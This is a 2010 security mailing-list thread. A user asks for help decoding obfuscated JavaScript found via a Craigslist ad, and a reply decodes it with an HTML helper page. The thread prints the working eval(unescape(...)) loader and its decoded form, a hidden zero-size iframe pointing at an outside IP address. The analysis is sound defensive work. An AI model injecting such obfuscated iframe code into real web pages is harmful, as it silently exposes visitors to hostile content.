PaulDotCom mailing list archives

Decode this Javascript?


From: nutjob.ie at gmail.com (Pat)
Date: Wed, 7 Apr 2010 14:07:51 +0100

*How to Figure it out*:

<HTML>
<HEAD>

<SCRIPT LANGUAGE="JavaScript">

function MsgBox () {

document.write("<BR>OUTER:<BR>");
document.write(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

document.write("<BR>Inner (Url encoded):<BR>");
document.write(escape(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,50,48,49,46,50,51,53,46,50,51,53,46,49,55,52,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62)));




}

// - End of JavaScript - -->
</SCRIPT>

</HEAD>


<BODY>

<FORM>

<INPUT NAME="submit" TYPE=Button VALUE="Show Me" onClick="MsgBox()">
</FORM>

</BODY>
</HTML>











*THE ANSWER:*
<iframe src="http://201.235.235.174/index.php"; width="0"
height="0"></iframe>




On Wed, Apr 7, 2010 at 3:11 AM, Rhonda Kreklau <rhonda.kreklau at gmail.com>wrote:

I found this by following a Craigslist ad asking for redesign job on a
website...can someone decode it for me...


eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

Thanks

Rhonda
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100407/a5cf3694/attachment.htm 


Current thread: